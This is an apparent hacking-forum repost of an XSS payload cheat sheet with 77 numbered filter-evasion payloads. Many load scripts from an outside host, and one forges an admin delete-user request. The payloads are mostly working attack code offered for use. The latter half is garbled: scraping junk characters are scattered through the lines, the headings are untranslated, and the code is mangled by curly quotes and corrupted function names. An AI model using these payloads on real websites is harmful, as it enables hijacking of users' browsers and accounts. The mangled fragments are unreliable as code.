
XSS Attack Roundup

Posted on 2013-4-19 19:22:37
It seems t00ls has fairly little material on XSS; I saw something good and copied it over, in case any of you want to bookmark it.
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Fixing the defective IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also with no semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null byte
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null byte 2; null bytes are basically useless domestically, because there is nowhere they can be exploited
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
, C9 z- ]/ G3 c5 `2 }" ~* a(46)DIV background-image0 @. n0 P/ R. L" O; @" U
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- ]$ v( M% C1 _0 Z9 H$ i(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
) V5 e  ~, }3 }" s8&13&12288&65279): m+ F. h( f6 U% t! S$ o% v
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! H( S, i; T+ l8 n: D
(48)DIV expression
/ X% _1 x( y$ H, E( `9 \( M<DIV STYLE=”width: expression_r(alert(‘XSS’));”>6 W5 o. G& |( B
(49)STYLE属性分拆表达; o% I5 h, R6 c6 n5 }. Q# f4 I
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
% U7 s& ?( M$ w  f( q(50)匿名STYLE(组成:开角号和一个字母开头): o4 [7 Y% x8 P) G: u  @! ?
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>: _3 v( M6 {2 p. U5 X2 i1 w
(51)STYLE background-image) _( ~$ w+ M7 D( S4 \1 V5 u; v! N2 A
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
; p: G. H0 X6 g9 oCLASS=XSS></A>
1 E2 P3 D" [1 ^! K4 D  w(52)IMG STYLE方式
: X0 q- D! ~1 |0 ?$ @  ^exppression(alert(“XSS”))’>
1 w$ T% X& `& g! d5 B(53)STYLE background* s) S6 W2 {+ f" Y/ c
<STYLE><STYLE( w$ z6 _. J8 |' `" S$ m+ e
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>7 T3 k  m4 F; ]- q% F' d* T
(54)BASE
9 ~( ~2 e8 j; T$ F( ~0 L  l8 X; y' d<BASE HREF=”javascript:alert(‘XSS’);//”>' m. D/ R5 C: f" `/ i
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS% @4 F* \: M/ [& J. T
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>6 C0 w) Y6 N( N5 u. @" L
(56)在flash中使用ActionScrpt可以混进你XSS的代码
* g& |* I9 Y; w( o. j" \7 C* v/ fa=”get”;/ d8 ~! P4 }6 p5 _" J
b=”URL(\”";
% Y$ j6 ^# e% \; K: W% l4 tc=”javascript:”;; W# {8 d& X8 I! O! q3 E
d=”alert(‘XSS’);\”)”;0 f3 P1 C7 d3 w7 _3 `: D9 n
eval_r(a+b+c+d);
  J8 g( O6 X7 C) j% `% u, o: v(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
" c3 O, a$ A/ T5 @/ J<HTML xmlns:xss>
+ H9 S2 O  u# v9 o. @<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>2 F$ h& t3 Y6 K$ n5 q( O8 h
<xss:xss>XSS</xss:xss>' Z. D% Q6 d$ R8 j2 I, l$ @; k
</HTML>6 I6 i* p( }8 m) ^: z7 A
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
3 W% z. S* ]+ ~' {4 }7 [' i1 F<SCRIPT SRC=””></SCRIPT>
. V' z- @1 }# F- {9 I: {; @! h(59)IMG嵌入式命令,可执行任意命令1 ]3 {4 A: h7 o
<IMG SRC=”http://www.XXX.com/a.php?a=b”>2 r2 h( ^1 s" p4 K8 p
(60)IMG嵌入式命令(a.jpg在同服务器)8 r! {1 \: C& n0 [
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
# t3 B: W! S  ^; n' b9 P(61)绕符号过滤
' u  Z4 ]9 e8 F<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>' i. M& T1 Z! K4 @9 t9 z  P
(62)
3 m. x- W# r7 s4 q$ a<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>5 u, m! P/ u. t* l" L! |5 \. G
(63)
- E/ q; V. r1 Z6 v<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
9 p5 u2 a2 }! {(64)
! p( K0 o1 _8 [% P<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
& r5 Z, b2 b  J7 n(65)* m+ o* t* _; R
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
+ h# X2 Z: W9 [& x* Q(66)12-7-1 T00LS - Powered by Discuz! Board% @0 c; L4 P: N& p5 r
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
0 ?/ e( p! ]* x9 u/ C1 L3 `<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>' E. M+ f1 K9 l% |; X
(67)
0 C; o) V5 N. u. d5 L5 e; m" I<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
; P4 |: ~+ @: B# e, H$ U+ m$ q</SCRIPT>. T; i+ T% u+ C$ L1 R: O
(68)URL绕行
4 l3 z# a' D4 b4 l) C$ c<A HREF=”http://127.0.0.1/”>XSS</A>
( }% a0 L+ Y( R$ S8 N8 i7 P(69)URL编码5 ?3 U2 Z4 Z0 @. B+ F
<A HREF=”http://3w.org”>XSS</A>. |5 L  c1 Z% i# M) `
(70)IP十进制
+ d/ z8 R1 C& I<A HREF=”http://3232235521″>XSS</A>
$ q+ W- k2 k( g1 z, g) J(71)IP十六进制  }9 `, D# d& m+ b. G" ~+ r9 n
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
$ j) @( |3 J% |; L% g(72)IP八进制- P- Q& W6 @7 l4 x
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
& r9 W% ?5 h+ D) F3 z6 I6 ?(73)混合编码% @% e3 F+ K. A8 o+ S* t
<A HREF=”h( ^$ {# }$ F& G( v- s* m4 V' j
tt p://6 6.000146.0×7.147/”">XSS</A>. [  X5 c& Z2 v5 y0 m
(74)节省[http:]
6 b* S/ K" P- r# t! }! i9 G4 V<A HREF=”//www.google.com/”>XSS</A>
: x$ M; W4 J4 k' }0 ?(75)节省[www]
  Y  y8 w! W- P" I2 N; _4 I, [<A HREF=”http://google.com/”>XSS</A>* y3 t1 l9 X* A- C' Z
(76)绝对点绝对DNS0 F& [9 W/ @6 _. Q3 m
<A HREF=”http://www.google.com./”>XSS</A>1 q8 s2 R  Z4 {6 ]* T5 q  c# T! o
(77)javascript链接
2 m/ P, S2 i2 P. @, W5 ]8 A<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
Original source: http://fuzzexp.org/u/0day/?p=14